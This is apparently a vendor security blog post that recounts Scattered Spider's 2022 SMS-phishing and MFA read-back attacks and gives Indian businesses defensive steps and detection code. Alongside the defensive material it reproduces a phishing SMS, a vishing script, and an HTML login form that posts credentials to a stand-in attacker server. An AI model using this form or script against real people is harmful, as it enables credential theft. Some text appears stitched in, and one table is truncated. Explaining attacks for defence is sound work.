Scattered Spider's 'Tylerb' Guilty: What Indian SMBs Must Learn
Originally reported by Krebs on Security
In April 2026, Tyler Robert Buchanan, a 24-year-old British national and senior member of the notorious Scattered Spider cybercrime group, pleaded guilty to wire fraud conspiracy and aggravated identity theft. This wasn't a minor breach. Buchanan's role in a coordinated campaign of text-message phishing attacks in summer 2022 led to the compromise of at least a dozen major technology companies—and the theft of tens of millions of dollars in cryptocurrency from investors.
When I was architecting security for Fortune 500 companies, I saw how sophisticated threat actors exploit the weakest link: human trust. Scattered Spider perfected this art. But here's what kept me up at night then, and what drives my work at Bachao.AI now: if this can happen to tech giants with security teams of hundreds, what about Indian SMBs operating with lean security budgets?
Let me walk you through what happened, why it matters to you, and exactly what you need to do about it.
What Happened
Scattered Spider isn't your typical ransomware gang. They're a social engineering collective—masters of psychological manipulation combined with technical precision. In summer 2022, they launched a series of carefully crafted SMS phishing campaigns targeting employees at major technology and cryptocurrency companies.
The attacks were disturbingly simple in concept but devastatingly effective in execution:
- Initial reconnaissance: Scattered Spider identified high-value targets—employees at companies holding significant cryptocurrency assets or with access to sensitive systems.
- SMS phishing at scale: They sent thousands of text messages impersonating IT support, HR teams, or security departments. The messages looked legitimate, created urgency ("Your account will be locked in 2 hours"), and directed recipients to fake login pages.
- Credential harvesting: When employees entered their credentials on these fake pages, Scattered Spider captured them in real-time.
- Multi-factor authentication bypass: Here's where it got clever—they used the stolen credentials to attempt login, triggering legitimate MFA prompts on the victim's actual phone. They then called the employee directly, claiming to be from IT, and social engineered them into reading back the MFA code.
- Account takeover and lateral movement: Once inside, they moved laterally through networks, escalating privileges and accessing cryptocurrency wallets, investor funds, and sensitive intellectual property.
Why This Matters for Indian Businesses
You might think: "This happened to tech giants. We're a mid-sized software company / e-commerce startup / fintech firm in India. Why should we worry?"
Here's the uncomfortable truth: Scattered Spider's playbook is now public, and threat actors worldwide are copying it.
As someone who's reviewed hundreds of Indian SMB security postures, I can tell you that most of you are running on the same infrastructure that was vulnerable in 2022:
- Weak SMS-based authentication: Many Indian businesses still rely on SMS OTP as their primary MFA method. Scattered Spider proved this is bypassable through social engineering.
- Minimal security awareness training: Most Indian SMBs don't conduct regular phishing simulations or employee awareness programs. Scattered Spider's success hinged on human error—not technical exploits.
- Lack of detection mechanisms: If you don't have SIEM (Security Information and Event Management) or behavioral monitoring, you won't detect when an attacker is moving laterally through your network. Tech giants took weeks to notice.
- Regulatory exposure: Under the Digital Personal Data Protection (DPDP) Act 2023, you're required to implement reasonable security measures and notify CERT-In of breaches within 6 hours. A Scattered Spider-style attack could expose you to penalties of up to ₹250 crores.
- Cryptocurrency and fintech targets: If you operate in India's booming crypto, fintech, or payment sectors, you're a direct target. Scattered Spider specifically hunted companies with access to financial assets.
Technical Breakdown: How Scattered Spider Operated
Let me map out the attack flow so you understand exactly where defenses should have stopped them:
```mermaid
graph TD
A["📱 SMS Phishing Campaign"] -->|Targets employees| B["👤 Social Engineering"]
B -->|Fake IT support call| C["🔐 Credential Harvesting"]
C -->|Username + Password captured| D["📲 MFA Bypass via Social Eng"]
D -->|Employee reads back OTP| E["✅ Account Takeover"]
E -->|Lateral movement begins| F["🔑 Privilege Escalation"]
F -->|Access to crypto wallets| G["💰 Data Exfiltration & Theft"]
G -->|Funds transferred| H["🚨 Breach Detected Too Late"]
```

The SMS Phishing Message
Here's what a typical Scattered Spider SMS looked like (reconstructed from breach reports):
```text
Hi John,
Your account will be locked in 2 hours due to unusual activity.
Verify now: hxxps://okta-verify-secure.com/login
— IT Security Team
```

Notice the elements:
- Urgency (2-hour deadline)
- Authority (IT Security Team)
- Legitimacy (the link reads like a real Okta login URL, but okta-verify-secure.com is a lookalike domain, not okta.com)
- Action (click the link)
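The lookalike-domain check those four elements call for, as an added example (not the author's or Bachao.AI's code): given a short allowlist of the domains a company actually signs in through, it flags any URL whose host merely borrows a brand name, and it generates the brand-plus-keyword candidates (the pattern okta-verify-secure.com follows) that a registration monitor could watch. The allowlist, keyword list and sample SMS are constructed for the demo.

```python
import itertools
import re
import socket
from urllib.parse import urlparse

# Constructed allowlist: the domains this company legitimately signs in through.
LEGIT_DOMAINS = {"okta.com", "example-corp.com"}

# Words attackers append to a brand so the host reads like a security notice
# (the quoted SMS used "verify" and "secure").
KEYWORDS = ["verify", "secure", "login", "security", "auth", "sso"]


def host_of(url: str) -> str:
    """Lowercase host of a URL; accepts defanged hxxp(s):// as used in reports."""
    url = re.sub(r"^hxxp", "http", url, flags=re.I)
    if "://" not in url:
        url = "https://" + url
    return (urlparse(url).hostname or "").lower().rstrip(".")


def is_legit_host(host: str) -> bool:
    """True only for an allowlisted domain or one of its subdomains."""
    return any(host == d or host.endswith("." + d) for d in LEGIT_DOMAINS)


def is_lookalike(url: str) -> bool:
    """Flag a host that borrows an allowlisted brand name without being that domain."""
    host = host_of(url)
    if not host or is_legit_host(host):
        return False
    labels = host.split(".")
    registrable = labels[-2] if len(labels) >= 2 else labels[0]
    brands = {d.split(".")[0] for d in LEGIT_DOMAINS}
    # Brand embedded in the registrable label (okta-verify-secure.com) or used
    # as a subdomain label (okta.evil.example) both count as lookalikes.
    return any(b in registrable or b in labels for b in brands)


def lookalike_candidates(domain: str) -> list[str]:
    """Brand plus one or two keywords, hyphen-joined, under the brand's own TLD."""
    brand, _, tld = domain.partition(".")
    out = []
    for n in (1, 2):
        for combo in itertools.permutations(KEYWORDS, n):
            out.append(f"{brand}-{'-'.join(combo)}.{tld}")
    return out


def registered_candidates(domain: str) -> list[str]:
    """Candidates that currently resolve in DNS (network call; not exercised offline)."""
    live = []
    for name in lookalike_candidates(domain):
        try:
            socket.gethostbyname(name)
            live.append(name)
        except OSError:
            pass
    return live


SAMPLE_SMS = (  # constructed, mirroring the message quoted above
    "Hi John,\nYour account will be locked in 2 hours due to unusual activity.\n"
    "Verify now: hxxps://okta-verify-secure.com/login\n- IT Security Team"
)


def flag_urls(text: str) -> list[str]:
    """URLs in a message whose host is a lookalike of an allowlisted brand."""
    urls = re.findall(r"\bh(?:tt|xx)ps?://\S+", text, flags=re.I)
    return [u for u in urls if is_lookalike(u)]


if __name__ == "__main__":
    print("flagged in SMS:", flag_urls(SAMPLE_SMS))
    print("candidates to monitor for okta.com:", lookalike_candidates("okta.com"))
```

The allowlist approach is deliberately strict: `company.okta.com` passes because it is a subdomain of an allowlisted domain, while anything else that contains the brand string is treated as suspicious and left for a human to clear. `registered_candidates` is the piece you would schedule daily against a registration or passive-DNS source.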
The Fake Login Page
They hosted a pixel-perfect replica of the target company's login page:
```html
<!-- Simplified example of what they created -->
<form action="https://attacker-server.com/capture" method="POST">
<input type="email" name="username" placeholder="Email" required>
<input type="password" name="password" placeholder="Password" required>
<button type="submit">Verify Account</button>
</form>
```

When an employee submitted this form, their credentials went directly to the attacker's server, not to the legitimate company.
The MFA Bypass
Once they had credentials, they attempted login on the real system. When prompted for MFA, they called the employee:
```text
Attacker: "Hi John, this is IT Security. We detected a login attempt on your account.
Can you read me the 6-digit code on your authenticator app?"
Employee (trusting): "Sure, it's 847392."
Attacker: "Thanks, that confirms it's really you. You're all set."
```

Result: Attacker now has username + password + current MFA code. They log in while the employee is still on the call, and the employee never realizes they've been compromised.
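What that sequence looks like in sign-in logs, and one rule that catches it, as an added example (not the author's or Bachao.AI's code): a password replay from a never-seen IP triggers an MFA challenge, and minutes later the read-back code satisfies it from the same IP. The events below are constructed and only loosely modelled on Entra ID sign-in log fields; the rule alerts on an MFA-satisfied success from an origin the user has never used and notes when a challenge from that IP preceded it.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in events (field names are illustrative, not Entra's exact schema).
# 16 July: a password replay from a new IP gets an MFA challenge; three minutes
# later, during the "IT support" call, the read-back code satisfies it.
EVENTS = [
    {"time": "2022-07-14T09:02:00", "user": "john@example-corp.com", "ip": "203.0.113.10",
     "country": "IN", "device": "LAPTOP-JOHN", "result": "success", "mfa": "satisfied"},
    {"time": "2022-07-15T09:05:00", "user": "john@example-corp.com", "ip": "203.0.113.10",
     "country": "IN", "device": "LAPTOP-JOHN", "result": "success", "mfa": "satisfied"},
    {"time": "2022-07-15T09:10:00", "user": "asha@example-corp.com", "ip": "203.0.113.22",
     "country": "IN", "device": "LAPTOP-ASHA", "result": "success", "mfa": "satisfied"},
    {"time": "2022-07-16T14:31:00", "user": "john@example-corp.com", "ip": "198.51.100.77",
     "country": "US", "device": "", "result": "interrupted", "mfa": "challenged"},
    {"time": "2022-07-16T14:34:00", "user": "john@example-corp.com", "ip": "198.51.100.77",
     "country": "US", "device": "", "result": "success", "mfa": "satisfied"},
    {"time": "2022-07-16T15:00:00", "user": "asha@example-corp.com", "ip": "203.0.113.22",
     "country": "IN", "device": "LAPTOP-ASHA", "result": "success", "mfa": "satisfied"},
]


def build_baseline(events, before):
    """Per-user origins (ip, device) and countries from successful sign-ins before `before`."""
    known = defaultdict(lambda: {"origins": set(), "countries": set()})
    for e in events:
        if e["result"] == "success" and e["time"] < before:
            known[e["user"]]["origins"].add((e["ip"], e["device"]))
            known[e["user"]]["countries"].add(e["country"])
    return known


def detect_mfa_relay(events, baseline, since, lookback_minutes=30):
    """Alert on MFA-satisfied successes from an origin the user has never used,
    recording whether an MFA challenge from the same IP preceded it within the lookback."""
    challenges = defaultdict(list)  # (user, ip) -> times of MFA-challenged attempts
    alerts = []
    for e in sorted(events, key=lambda x: x["time"]):
        if e["time"] < since:
            continue
        t = datetime.fromisoformat(e["time"])
        if e["result"] != "success":
            if e["mfa"] == "challenged":
                challenges[(e["user"], e["ip"])].append(t)
            continue
        if e["mfa"] != "satisfied" or e["user"] not in baseline:
            continue  # no MFA involved, or no history to compare against yet
        hist = baseline[e["user"]]
        if (e["ip"], e["device"]) in hist["origins"]:
            continue  # known laptop from a known address: normal
        reasons = ["new ip/device for user"]
        if e["country"] not in hist["countries"]:
            reasons.append("new country for user")
        for c in challenges[(e["user"], e["ip"])]:
            gap = t - c
            if timedelta(0) <= gap <= timedelta(minutes=lookback_minutes):
                reasons.append(f"mfa challenged {int(gap.total_seconds() // 60)} min earlier from same ip")
                break
        alerts.append({"user": e["user"], "time": e["time"], "ip": e["ip"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    baseline = build_baseline(EVENTS, before="2022-07-16")
    for alert in detect_mfa_relay(EVENTS, baseline, since="2022-07-16"):
        print(alert)
```

The important design choice is that the alert fires on the successful sign-in, not the failed one: a single MFA challenge from a new IP is noise, but a challenge followed within minutes by an MFA success from a device the user has never signed in with is exactly the footprint of a read-back OTP. Fed from your identity provider's sign-in export, this rule would have fired while the employee was still on the phone.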
How to Protect Your Business
Let me give you a practical, layered defense strategy:
| Protection Layer | Action | Difficulty | Cost |
|---|---|---|---|
| Incident Response | Have a documented IR plan and 24/7 breach hotline | Hard | ₹200,000+/year |
Quick Fixes You Can Implement Today
1. Enable conditional access policies (if you use Microsoft Azure AD):
```text
# Block login attempts from unusual locations
# Require MFA for all users
# Enforce password complexity
# In Azure AD > Conditional Access > New Policy:
#   Condition: User risk = High
#   Grant: Require MFA + Change password
```
2. Set up DNS-based phishing detection:
```text
# Monitor registrations of typosquatting domains
# (similar to what Scattered Spider used)
# For okta.com, add monitoring for:
okta-verify.com
okta-security.com
okta-verify-secure.com
okta-login-secure.com
# Use a service like DomainTools or SecurityTrails to monitor
```
3. Implement a phishing reporting button in email:
```text
# If using Microsoft Outlook:
# Enable the "Report Message" add-in
# Train all staff: "See something phishing? Click Report Message."
# Review reports weekly and adjust email filters accordingly
```
4. Audit your MFA setup:
```powershell
# For Azure AD, check MFA registration with the legacy MSOnline module
# (Microsoft Graph PowerShell is the supported replacement).
# -All is required: without it Get-MsolUser returns only the first 500 users.
Connect-MsolService
Get-MsolUser -All | Where-Object { $_.StrongAuthenticationMethods.Count -eq 0 } | Select-Object UserPrincipalName
# This lists users WITHOUT any MFA method registered
# Result: Fix these immediately
```

How Bachao.AI Detects This Attack Vector
When I founded Bachao.AI, this exact scenario—social engineering + weak MFA + undetected lateral movement—was the pattern I saw repeatedly in Indian SMBs. Here's how we've built protections into our platform:
- Identifies weak MFA implementations
- Tests for social engineering vulnerabilities
- Simulates Scattered Spider-style lateral movement
- Generates a report showing exactly which systems are at risk
- Monthly phishing simulations tailored to your industry
- Real-time employee reporting of suspicious emails
- Tracks which employees are vulnerable and provides targeted training
- Prevents the initial SMS/email compromise that kicks off the attack
- Monitors for leaked employee credentials on dark web forums
- Alerts you if any of your staff's usernames appear in breach databases
- Gives you early warning before attackers can use stolen credentials
- 24/7 breach hotline with CERT-In notification support
- If you're compromised, we help you detect lateral movement within hours
- Ensures compliance with India's DPDP Act 6-hour notification deadline
Real Example: How We'd Catch This Attack
Imagine a Bachao.AI customer receives a Scattered Spider SMS phishing attack:
- Our Security Training module flags the phishing URL as suspicious (it's not on the company's whitelist of legitimate domains).
- Our VAPT scan (run quarterly) would have already identified that the customer's MFA setup relies on SMS OTP—a known weakness—and recommended hardware keys.
- If an employee fell for it, our Dark Web Monitoring would detect the leaked credentials within hours and alert the company to reset that user's password.
- If lateral movement began, a customer with our Incident Response service would have 24/7 monitoring to catch unusual network traffic (e.g., accessing crypto wallets from a new device).
- When breach is detected, we handle the CERT-In notification and DPDP Act compliance reporting—no guessing about India's 6-hour deadline.
What You Should Do Right Now
Today:
- [ ] Audit your MFA setup. Are you using SMS OTP or authenticator apps? (Hardware keys are best.)
- [ ] Check if your employees have received phishing training in the last 6 months. If not, start immediately.
- [ ] Review your incident response plan. Do you have a 24/7 breach hotline? Do you know how to notify CERT-In?
- [ ] Run a phishing simulation. Send 10% of your staff a fake phishing email. See who clicks. (This is how Scattered Spider identified targets.)
- [ ] Implement conditional access policies to block logins from unusual locations.
- [ ] Enable email security filtering to catch typosquatting domains.
- [ ] Conduct a VAPT scan to identify weaknesses in your authentication and access controls.
- [ ] Set up Dark Web Monitoring to track if your employees' credentials appear in breach databases.
- [ ] Document your incident response procedures and share them with your team.
The Bigger Picture
Scattered Spider's success wasn't due to a zero-day exploit or advanced malware. It was due to human trust combined with weak authentication and poor detection.
The good news? These are all fixable problems. You don't need a security team of hundreds. You need:
- Awareness: Train your people to spot phishing.
- Authentication: Make it hard to bypass (hardware keys > authenticator apps > SMS OTP).
- Detection: Monitor for unusual activity (lateral movement, credential access, data exfiltration).
- Response: Have a plan to act fast when something goes wrong.
Book Your Free VAPT Scan → We'll identify your vulnerabilities in 24 hours and give you a roadmap to fix them.
Written by Shouvik Mukherjee, Founder of Bachao.AI. Follow me on LinkedIn for daily cybersecurity insights for Indian businesses.